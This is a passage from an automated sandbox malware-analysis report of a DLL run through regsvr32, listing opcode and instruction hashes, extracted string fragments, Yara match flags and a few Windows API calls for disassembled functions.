                                                                    • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                    • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O)$,G$-
                                                                    • API String ID: 0-23008916
                                                                    • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                    • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                    • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                    • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;U[$L$Q#
                                                                    • API String ID: 0-2933747092
                                                                    • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                    • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                    • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                    • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5($<:*$qwX
                                                                    • API String ID: 0-3944236288
                                                                    • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                    • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                    • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                    • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 79&$s`~$v;
                                                                    • API String ID: 0-3844292866
                                                                    • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                    • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                    • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                    • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wQ_$1_$ac
                                                                    • API String ID: 0-1037425278
                                                                    • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                    • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                    • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                    • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )K$U|$|1-
                                                                    • API String ID: 0-2543966960
                                                                    • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                    • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                    • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                    • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6|$6`d$H~z
                                                                    • API String ID: 0-1702722476
                                                                    • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                    • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                    • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                    • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d~$`5$t>
                                                                    • API String ID: 0-1282322184
                                                                    • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                    • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                    • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                    • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #St$JYr$hmn
                                                                    • API String ID: 0-1556749129
                                                                    • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                    • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                    • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                    • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TGA$K$W}
                                                                    • API String ID: 0-588348707
                                                                    • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                    • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                    • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                    • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :1,$@H${C=
                                                                    • API String ID: 0-2737386091
                                                                    • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                    • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                    • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                    • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: prP$q<C$uL
                                                                    • API String ID: 0-1414207395
                                                                    • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                    • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                    • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                    • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :00D$Kl$(R'
                                                                    • API String ID: 0-3661897330
                                                                    • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                    • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                    • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                    • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _getptd.LIBCMT ref: 00007FFF21BB597E
                                                                      • Part of subcall function 00007FFF21BB6550: RtlCaptureContext.KERNEL32 ref: 00007FFF21BB658F
                                                                      • Part of subcall function 00007FFF21BB6550: IsDebuggerPresent.KERNEL32 ref: 00007FFF21BB662D
                                                                      • Part of subcall function 00007FFF21BB6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BB6637
                                                                      • Part of subcall function 00007FFF21BB6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BB6642
                                                                      • Part of subcall function 00007FFF21BB6550: GetCurrentProcess.KERNEL32 ref: 00007FFF21BB6658
                                                                      • Part of subcall function 00007FFF21BB6550: TerminateProcess.KERNEL32 ref: 00007FFF21BB6666
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                    • String ID: C
                                                                    • API String ID: 1583075380-1037565863
                                                                    • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                    • Instruction ID: aaeb9348c23040fdc13d089a57c3f7dd5518ce114a12e00bb3fa4af5be8eb3f1
                                                                    • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                    • Instruction Fuzzy Hash: 64518122E1868641EB709A21AD717BE52F0FB84B80F44A031EE4DD7EA9DE3DD605C709
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                    • Instruction ID: 62e81bb8ab09b120a50ce045b9105859f35d3463d8144adec7951b8e60ccb274
                                                                    • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                    • Instruction Fuzzy Hash: 2A218B32F0868696EB28DA26DD543EE63E0FB88746F001035CA1DC7AA5DF3CE6658604
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                    • Instruction ID: 157669f750e7ce41c7dcc6f1b7c180ca48bb8340de86947b42ba7c1982f7b2c2
                                                                    • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                    • Instruction Fuzzy Hash: 01219A32E08A8596EB28CB20E8953AD73B1FB88B81F805135DA5D87B64CF3CE655C704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$Y}
                                                                    • API String ID: 0-941771097
                                                                    • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                    • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                    • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                    • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 7;}~$?C
                                                                    • API String ID: 0-2633536567
                                                                    • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                    • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                    • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                    • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5"*$Wu
                                                                    • API String ID: 0-3407213400
                                                                    • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                    • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                    • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                    • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F/|$]M
                                                                    • API String ID: 0-4182351379
                                                                    • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                    • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                    • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                    • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;SH$nK
                                                                    • API String ID: 0-1681473137
                                                                    • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                    • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                    • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                    • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$z
                                                                    • API String ID: 0-3532108746
                                                                    • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                    • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                    • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                    • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g/?$~l;
                                                                    • API String ID: 0-1448562259
                                                                    • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                    • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                    • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                    • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JM$S
                                                                    • API String ID: 0-422059844
                                                                    • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                    • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                    • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                    • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \4t$sT>
                                                                    • API String ID: 0-514966222
                                                                    • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                    • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                    • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                    • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6 zT$lh
                                                                    • API String ID: 0-3667112246
                                                                    • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                    • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                    • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                    • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2Q'$t<p
                                                                    • API String ID: 0-2959822804
                                                                    • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                    • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                    • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                    • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
